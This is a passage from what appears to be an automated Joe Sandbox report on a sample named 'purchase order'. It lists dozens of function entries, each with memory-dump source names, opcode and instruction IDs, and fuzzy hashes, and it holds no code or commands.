                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a8b1dc66bfbcfe1dec51b7f2dd6cb036490238f0b1742ea23bdc781ad35bdc4b
                                                                                                              • Instruction ID: 18e9ae642a0e045f5830ba977ea93f142b0263dc89ab6804ee0a69bbe2895606
                                                                                                              • Opcode Fuzzy Hash: a8b1dc66bfbcfe1dec51b7f2dd6cb036490238f0b1742ea23bdc781ad35bdc4b
                                                                                                              • Instruction Fuzzy Hash: F5E0DF30C58348DECB51FFB4DD484AE3FB0AF02210B05C4ABE048DE0A2E7309149DB81
                                                                                                              Function 04AFEEE0 Relevance: .0, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f21c18ba031d54e79d761a20c7f9d26b48045128c88f648e8effcf64193aa59a
                                                                                                              • Instruction ID: 96baaeeedf21802b5c336b43ef0d780c118617a4b30dc10d51b18067233044a3
                                                                                                              • Opcode Fuzzy Hash: f21c18ba031d54e79d761a20c7f9d26b48045128c88f648e8effcf64193aa59a
                                                                                                              • Instruction Fuzzy Hash: 41E0C231409B858FC301EBB8D8A28E87F74EF0220870A01C6E084DB233FB55D44BCB41
                                                                                                              Function 04AFEA78 Relevance: .0, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 387dc800f5405c1a9b7373592ba1c80ea842fab0a9393eeaa73e9657c2ab2290
                                                                                                              • Instruction ID: e9243efbde8fc2df58d1dd2fd3bf8f26ace634c19ca8c83818f7100bf72d654b
                                                                                                              • Opcode Fuzzy Hash: 387dc800f5405c1a9b7373592ba1c80ea842fab0a9393eeaa73e9657c2ab2290
                                                                                                              • Instruction Fuzzy Hash: 79E0C2797441909FD702A774C5608A93F619F852113018087E440CB2B2CB31AC03C781
                                                                                                              Function 04AF1B18 Relevance: .0, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ff3555f1fb2d6197633f25326782f0e50d9a1d13cb73662d714958f3e027816
                                                                                                              • Instruction ID: 08834b9199acd9b85188dc459adae1168c3016f8eba0d4f0604f177f741ad62d
                                                                                                              • Opcode Fuzzy Hash: 9ff3555f1fb2d6197633f25326782f0e50d9a1d13cb73662d714958f3e027816
                                                                                                              • Instruction Fuzzy Hash: 1BE086B4A00209EFC704EFB4E54195D7BB5EF443147204164EC059331CDB326F09EB91
                                                                                                              Function 04AFEE70 Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3381cff1159f210361e6eae3d5b0229e95e621aa89bec928d07ad223c3aed731
                                                                                                              • Instruction ID: fbd9f74561208c6bbe5bf625b60dbdebcc04c9377bbfa80bf42ae228a9467c1f
                                                                                                              • Opcode Fuzzy Hash: 3381cff1159f210361e6eae3d5b0229e95e621aa89bec928d07ad223c3aed731
                                                                                                              • Instruction Fuzzy Hash: 8DC01252341938136E1E32DC6D202BF224E8FC4959744042DF70A4B291DE4C3D1202CE
                                                                                                              Function 04AFEF28 Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ca63d8809d074140cc500a8aa7536a6a85b403700b1189b721c49e598f83ce25
                                                                                                              • Instruction ID: 6c30e4a7f4109cf0533786eca1a5bf983d01716d0316a39dbaeb241a7e0c79e3
                                                                                                              • Opcode Fuzzy Hash: ca63d8809d074140cc500a8aa7536a6a85b403700b1189b721c49e598f83ce25
                                                                                                              • Instruction Fuzzy Hash: 40E0E23181060CDECBA0EFB9D94849A7BF8AB05211F00C52AE9099A150EA30E2A8DF80
                                                                                                              Function 04AFEAB1 Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac937ba2a72d9774bad3dfe12fef1a3de50fda38c094982c23ff0aab425a6d90
                                                                                                              • Instruction ID: 4c25677fa99935aaffaf8f53c2396e558363c9365cc574764c7c9edd513a0823
                                                                                                              • Opcode Fuzzy Hash: ac937ba2a72d9774bad3dfe12fef1a3de50fda38c094982c23ff0aab425a6d90
                                                                                                              • Instruction Fuzzy Hash: 3FD05B652045408BDB1267F5B6692AB7F11AB51382B04845FE146D5091CB345952C7D7
                                                                                                              Function 04AF1824 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0c310e53d44c42662615904ac7f803295df73d36272d44b0638b3ae28391e00a
                                                                                                              • Instruction ID: 00908f4a954bcb5c34bf84580702c0c7e058dbe12184eb5534fd8992ff5b3338
                                                                                                              • Opcode Fuzzy Hash: 0c310e53d44c42662615904ac7f803295df73d36272d44b0638b3ae28391e00a
                                                                                                              • Instruction Fuzzy Hash: 7DD05E31154B058FC700AB6CD985866BBB4FF86708B000991F20597235FB20F8448645
                                                                                                              Function 04AFB7A8 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5ae2570e0335b2c21503988ca64615e910fcc4857ec1c166e847227f747c9eca
                                                                                                              • Instruction ID: 5f86ce4fdb20afed60ca3449b15f0073a9fd00a728e045f59474c88267de9085
                                                                                                              • Opcode Fuzzy Hash: 5ae2570e0335b2c21503988ca64615e910fcc4857ec1c166e847227f747c9eca
                                                                                                              • Instruction Fuzzy Hash: 34D05B795451879FCF06FF64E8954543FB4F9013553044181D0408723BD728B56BD754
                                                                                                              Function 04AF1828 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 16a87c3e8b2662839f788fa1ccd3bedb5cb1929cafce5948866fef7381078da5
                                                                                                              • Instruction ID: 0236ed3651dd07b53b605508c60c85a170b46d2774c47eb676db74ce443c3898
                                                                                                              • Opcode Fuzzy Hash: 16a87c3e8b2662839f788fa1ccd3bedb5cb1929cafce5948866fef7381078da5
                                                                                                              • Instruction Fuzzy Hash: 7AD05E32154B44CFC300EBACE8858A5BBB4EF4A6047440290E1455B232EB61F8558B41
                                                                                                              Function 04AFEA88 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2699996b10201600e6cb980f9cf8695b0bfb0d3b31afdc13d40a831c15508086
                                                                                                              • Instruction ID: 69ffe852f6d431930e21a119e5dbab987359e478ccce463814f841abbb686819
                                                                                                              • Opcode Fuzzy Hash: 2699996b10201600e6cb980f9cf8695b0bfb0d3b31afdc13d40a831c15508086
                                                                                                              • Instruction Fuzzy Hash: 8DD0C9327401249F8604AA68D400CAA7BA9DB996613014066F905CB331CA61EC5287D4
                                                                                                              Function 04AFEAC0 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 71a07a975ecaf9a685d735fc7d46f4426ea494b7395b6ef02bba21d1fc03d8fc
                                                                                                              • Instruction ID: 6713405b53e3bac168fe7a5f7388f15383dbc5488fd1f441267dc95cb1109437
                                                                                                              • Opcode Fuzzy Hash: 71a07a975ecaf9a685d735fc7d46f4426ea494b7395b6ef02bba21d1fc03d8fc
                                                                                                              • Instruction Fuzzy Hash: 31D0A93130012897CB252AAAA8082ABBA4DEB40792F004039F60682180CF289820C2EA
                                                                                                              Function 04AF9B38 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 95df18d589e59d5598b45fcd8234588fcfc13131193cdbfb813dfed0aab81249
                                                                                                              • Instruction ID: 856c8496215d8b273210051f839dfbd72a1510226a98bb6b187724d328df13ff
                                                                                                              • Opcode Fuzzy Hash: 95df18d589e59d5598b45fcd8234588fcfc13131193cdbfb813dfed0aab81249
                                                                                                              • Instruction Fuzzy Hash: FAD05E351082489FC7019F25D895C95BFF8EF1A724B1680D2FD888B223D231AD16CB91
                                                                                                              Function 04AFBD48 Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd755059daf0da0498681b3a32c42d760447bfc2db0fc7761fb6822e17b85e0a
                                                                                                              • Instruction ID: 883b05e5320291112dcae8f3ec0690d3a706054c2d3571f904b7f8e3ac56ddb9
                                                                                                              • Opcode Fuzzy Hash: dd755059daf0da0498681b3a32c42d760447bfc2db0fc7761fb6822e17b85e0a
                                                                                                              • Instruction Fuzzy Hash: 71E0E278A40109CFCB14CFA4D598AEDBBB0EF0C304F20845AE502AB261CB746804CF60
                                                                                                              Function 04AFDB80 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4443d48f14af2c535b9fb58b013521605a53cd799728d5986ac1030fb42aea9c
                                                                                                              • Instruction ID: e43cf0909707565ad3e834ed121dd0fa4cd3180119d06f5f37c78aa5670a9530
                                                                                                              • Opcode Fuzzy Hash: 4443d48f14af2c535b9fb58b013521605a53cd799728d5986ac1030fb42aea9c
                                                                                                              • Instruction Fuzzy Hash: 78B09B2131413913D60831DD64206BE728D47C55A9F500067A60DC77454CC5AD4102EE
                                                                                                              Function 04AF9B0E Relevance: .0, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dcea9f5cfac542d318b27014d0087cc80725d58e876515100a8b8faabea1972b
                                                                                                              • Instruction ID: 1da5d190700ef7791e5fe29746445042afebe00857dcf0913965c5d16d118425
                                                                                                              • Opcode Fuzzy Hash: dcea9f5cfac542d318b27014d0087cc80725d58e876515100a8b8faabea1972b
                                                                                                              • Instruction Fuzzy Hash: 66D02371C247068DF30077785C0004CBB70FEA2214F41471FD190870E1FB208159C741
                                                                                                              Function 04AF9B48 Relevance: .0, Instructions: 9COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                              • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                                                              • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                              • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90

                                                                                                              Non-executed Functions

                                                                                                              Function 04AF47E8 Relevance: 6.7, Strings: 5, Instructions: 453COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                                              • API String ID: 0-3486158592
                                                                                                              • Opcode ID: eae056b318f8b92a6590024f0ab5a5b38b2289dcf0c9ea111ddcebeff568e8fa
                                                                                                              • Instruction ID: 2399229dcf3700abb173296250479ed79b24203a34c92c25e0a16b7912e92e5a
                                                                                                              • Opcode Fuzzy Hash: eae056b318f8b92a6590024f0ab5a5b38b2289dcf0c9ea111ddcebeff568e8fa
                                                                                                              • Instruction Fuzzy Hash: FE025D34B005158FDB18DFA9C988A6EB7B2BF98710B158269EA15DB375DB30FC02CB50
                                                                                                              Function 068E4400 Relevance: .3, Instructions: 319COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b763f659a77783a7a026b2b2141ce58deaede3f7bb5002285eadef622f55af2
                                                                                                              • Instruction ID: 4eab24aa2d5eb5b07760e447d7ab9f16f89e377cd42852d6783a2b969bb12813
                                                                                                              • Opcode Fuzzy Hash: 8b763f659a77783a7a026b2b2141ce58deaede3f7bb5002285eadef622f55af2
                                                                                                              • Instruction Fuzzy Hash: 51E10D74E001198FDB14DFA9C5809AEFBF2FF89305F248559E519AB35AD730A942CFA0
                                                                                                              Function 04A10040 Relevance: .3, Instructions: 315COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844040022.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4a10000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1f6296eea11a1ee8a673fa62adac2107d4f4513ff5be2ca78b1938217db02070
                                                                                                              • Instruction ID: 5e27726b441e136feb6ec44243ee576a89982fa52c024536e500e58724c2301d
                                                                                                              • Opcode Fuzzy Hash: 1f6296eea11a1ee8a673fa62adac2107d4f4513ff5be2ca78b1938217db02070
                                                                                                              • Instruction Fuzzy Hash: C312A7B2C917458AE710CF25EDCC2893BB1B745318BD04A1AD2611F2E9E7B4166EEF4C
                                                                                                              Function 068E5F80 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c26e290128839e969ffbe1352090f0fe2d092c2d2e8a23ca83b1523bdd702bc
                                                                                                              • Instruction ID: 460dd8811f01a56facb66cdb4e4a719e987cc66966b882d7c3f43eb7dc6b0326
                                                                                                              • Opcode Fuzzy Hash: 6c26e290128839e969ffbe1352090f0fe2d092c2d2e8a23ca83b1523bdd702bc
                                                                                                              • Instruction Fuzzy Hash: D2E11D74E001198FDB54DF99C5809AEFBF2FF89304F248569E415AB35AD730A982CF61
                                                                                                              Function 068E3FD8 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 30b4f26da5a8f00a5cf60f286daacd9fed392216be395221eb1696b573ae9d07
                                                                                                              • Instruction ID: c623cd4f0b477a83f9eaa63194450339cf96dc740a4d7bc7bc5559005590ceac
                                                                                                              • Opcode Fuzzy Hash: 30b4f26da5a8f00a5cf60f286daacd9fed392216be395221eb1696b573ae9d07
                                                                                                              • Instruction Fuzzy Hash: 7FE1ED74E001198FDB54DFA9C5809AEFBF2FF89304F248169E419AB35AD731A942CF61
                                                                                                              Function 068E5B48 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dfefdc2a39ca829578a174205b2c2b46b6b321387d26b8c578221c3d6ac84bd3
                                                                                                              • Instruction ID: a18a13228c5762a0b4cc25d9e4ef6c0284ef92eb7c03a1d2ccfa8bf919362801
                                                                                                              • Opcode Fuzzy Hash: dfefdc2a39ca829578a174205b2c2b46b6b321387d26b8c578221c3d6ac84bd3
                                                                                                              • Instruction Fuzzy Hash: 76E1ED74E001198FDB54DFA9C5809AEFBB2FF49308F248169E415AB35AD731AD42CFA1
                                                                                                              Function 068E4848 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0efc2c90a4726f100ed00429affbea0fd2f8e4f70f6f200ea18323c5126f32d5
                                                                                                              • Instruction ID: 9c349d0650347fb4a98c37ab3732b33fa9b6b925e9e433c25c12f8c49f8531d6
                                                                                                              • Opcode Fuzzy Hash: 0efc2c90a4726f100ed00429affbea0fd2f8e4f70f6f200ea18323c5126f32d5
                                                                                                              • Instruction Fuzzy Hash: EDE10C74E001198FDB14DFA9D5809AEFBF2FF89304F248169E419AB35AD731A941CFA1
                                                                                                              Function 04AF2757 Relevance: .3, Instructions: 268COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 36152a0eea385a12cccdb23f9977971b15ee893011232d35a2350a4663f11a42
                                                                                                              • Instruction ID: 61bad15b02087353658e951017aebb1da6e505ae7b33ebf3995cc35f4e90b0ae
                                                                                                              • Opcode Fuzzy Hash: 36152a0eea385a12cccdb23f9977971b15ee893011232d35a2350a4663f11a42
                                                                                                              • Instruction Fuzzy Hash: BED12735D10A5ACACB14EB65D990A9DF371FF95300F10C79AE4093B225EB70AAC9CF81
                                                                                                              Function 0235DFB4 Relevance: .3, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e015e08a83b35c33a5557a20ec81e0bc421ae5348bebd11cd9b4cb9ef34e8587
                                                                                                              • Instruction ID: 19022ca99a5ce5756df27d405dcd0f65301dddf7c42f585c0f0c6e3e577423f5
                                                                                                              • Opcode Fuzzy Hash: e015e08a83b35c33a5557a20ec81e0bc421ae5348bebd11cd9b4cb9ef34e8587
                                                                                                              • Instruction Fuzzy Hash: 7EA15E32E002158FCF15DFB5C88499EB7B2FF85304B15456AED09AB265DB31E955CF80
                                                                                                              Function 04AF2768 Relevance: .3, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fea8c0805a18cf5460408c691807f961fcb75138de551f76ce7019255d765a70
                                                                                                              • Instruction ID: 7da575cb434b1dc0647de8613c11c7663a00894bd5b50455c5ae5f34b94f2e0f
                                                                                                              • Opcode Fuzzy Hash: fea8c0805a18cf5460408c691807f961fcb75138de551f76ce7019255d765a70
                                                                                                              • Instruction Fuzzy Hash: FCD11735D10A5ACACB14EB65D990A9DF371FF95300F10C79AE4093B225EB74AAC9CF81
                                                                                                              Function 04A10006 Relevance: .2, Instructions: 239COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844040022.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4a10000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 98e96f233a90b399ac6fcba542b399c7c3826912dc0f7cfa04d8ca1100d288a7
                                                                                                              • Instruction ID: 61afa44efd61a1049107997139feaca7d1b04381e7acd2927c1a6cb51ee8a93d
                                                                                                              • Opcode Fuzzy Hash: 98e96f233a90b399ac6fcba542b399c7c3826912dc0f7cfa04d8ca1100d288a7
                                                                                                              • Instruction Fuzzy Hash: EBC13DB1C907458FD710CF25EC8C1897BB1BB85318F944A0AD1616F2E9EBB4166EEF48
                                                                                                              Function 068E483A Relevance: .1, Instructions: 132COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f672a766c4daa77c7c5c9fe3026d398908c8360ee272dd3b6c62722c0adcd491
                                                                                                              • Instruction ID: 9fad39ac0cca708050c4d6d7a7d98139b2d4df67ffda610b3acf4e99212f32d2
                                                                                                              • Opcode Fuzzy Hash: f672a766c4daa77c7c5c9fe3026d398908c8360ee272dd3b6c62722c0adcd491
                                                                                                              • Instruction Fuzzy Hash: F2510A74E002198FDB14DFA9C5845AEFBF2FF89304F24816AD419A7356D7319942CFA1
                                                                                                              Function 068E7E19 Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5fb55de1f4bee47d072f5bfc4f5fc7bec81bfdaed31be727657f13b55cc0fec4
                                                                                                              • Instruction ID: d5ee6f807e72952419cb2993ae9db08c9f8bec85ea2e7b1e6ca1eb8b0fc7b072
